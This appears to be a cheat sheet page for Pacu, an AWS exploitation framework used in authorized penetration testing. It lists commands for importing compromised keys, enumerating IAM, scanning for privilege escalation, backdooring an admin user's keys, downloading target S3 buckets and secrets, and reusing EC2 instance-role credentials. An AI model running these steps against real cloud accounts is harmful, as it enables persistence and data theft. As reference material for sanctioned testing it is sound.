CyberCheatsheets

Pacu Cheat Sheet

AWS exploitation framework with modules for privilege escalation, persistence, and data exfiltration after key compromise.

Cloud & ContainersawsenumerationexploitationUpdated 2026-06-02

Overview

Pacu automates offensive AWS security testing: enumeration modules, privilege escalation paths, and exfiltration. Run after valid AWS credentials are confirmed with aws sts get-caller-identity.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
pip install -r requirements.txt

Wrapper

bash install.sh
python3 pacu.py

Essential commands

Inside Pacu shell

import_keys attacker

Enter Access Key, Secret, Session Token (optional), region

whoami
data
list
run iam__enum_users_roles_policies_groups

Common workflows

Import creds and baseline enum —

python3 pacu.py
Pacu > import_keys
Pacu (attacker:import_keys) > set AWS_ACCESS_KEY_ID AKIA...
Pacu (attacker) > run iam__enum_permissions
Pacu (attacker) > run iam__enum_users_roles_policies_groups
Pacu (attacker) > run ec2__enum
Pacu (attacker) > run s3__enum_buckets

Privilege escalation —

Pacu (attacker) > run iam__privesc_scan

Review suggested IAM policy attachments / PassRole

Pacu (attacker) > run iam__backdoor_users_keys --user-name target-admin

Data exfiltration —

Pacu (attacker) > run s3__download_bucket --bucket-names target-bucket
Pacu (attacker) > run secretsmanager__enum
Pacu (attacker) > run lambda__enum

After curling IMDS on EC2

Pacu > import_keys ec2-role

Paste temporary creds from instance role

Pacu (ec2-role) > run ec2__download_userdata

SQLite data / reporting —

Pacu (attacker) > data

Flags reference

import_keys NAME

New key set / session

set_keys NAME

Switch active keys

run MODULE

Execute module

run MODULE --help

Module parameters

list

Available modules

whoami

Current AWS identity

data

Session loot summary

exit

Quit (session saved)

Tips

  • Modules are noisy — map to CloudTrail; get approval for destructive modules.
  • Combine with enumerate-iam (bundled concept) output from iam__enum_permissions.
  • Always whoami after import — wrong region breaks EC2 modules.
  • Update Pacu regularly; new AWS attack modules land frequently.

References

Related cheat sheets